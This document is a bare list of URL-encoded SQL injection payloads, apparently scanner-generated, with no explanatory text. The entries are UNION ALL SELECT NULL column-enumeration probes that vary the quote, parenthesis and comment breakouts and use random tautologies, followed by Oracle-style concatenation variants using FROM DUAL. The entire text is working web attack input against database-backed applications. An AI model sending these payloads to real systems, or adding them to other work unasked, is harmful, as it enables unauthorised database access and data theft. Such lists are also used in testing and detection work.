1%27%29%20WHERE%201510%3D1510%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%29%20WHERE%204275%3D4275%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%29%20WHERE%209675%3D9675%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%29%20WHERE%203400%3D3400%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%20WHERE%209448%3D9448%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%20WHERE%205951%3D5951%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%20WHERE%203540%3D3540%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%20WHERE%208260%3D8260%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%20WHERE%205181%3D5181%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%20WHERE%207236%3D7236%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%20WHERE%201703%3D1703%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%20WHERE%207922%3D7922%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%20WHERE%203762%3D3762%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%20WHERE%209906%3D9906%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%22%20WHERE%209393%3D9393%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%22%20WHERE%202056%3D2056%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%22%20WHERE%206654%3D6654%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%22%20WHERE%201039%3D1039%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%22%20WHERE%201625%3D1625%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%22%20WHERE%203973%3D3973%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%22%20WHERE%207657%3D7657%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%22%20WHERE%209187%3D9187%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%22%20WHERE%208368%3D8368%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%22%20WHERE%203850%3D3850%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%20%7C%7C%20%28SELECT%209382%20FROM%20DUAL%20WHERE%202051%3D2051%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%202808%20FROM%20DUAL%20WHERE%204954%3D4954%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%201986%20FROM%20DUAL%20WHERE%202448%3D2448%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%201784%20FROM%20DUAL%20WHERE%201510%3D1510%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%207206%20FROM%20DUAL%20WHERE%203494%3D3494%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%203823%20FROM%20DUAL%20WHERE%206281%3D6281%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%202839%20FROM%20DUAL%20WHERE%209803%3D9803%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%209008%20FROM%20DUAL%20WHERE%204517%3D4517%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%209020%20FROM%20DUAL%20WHERE%204977%3D4977%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%205676%20FROM%20DUAL%20WHERE%201365%3D1365%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%206680%20WHERE%204595%3D4595%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%205768%20WHERE%207724%3D7724%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 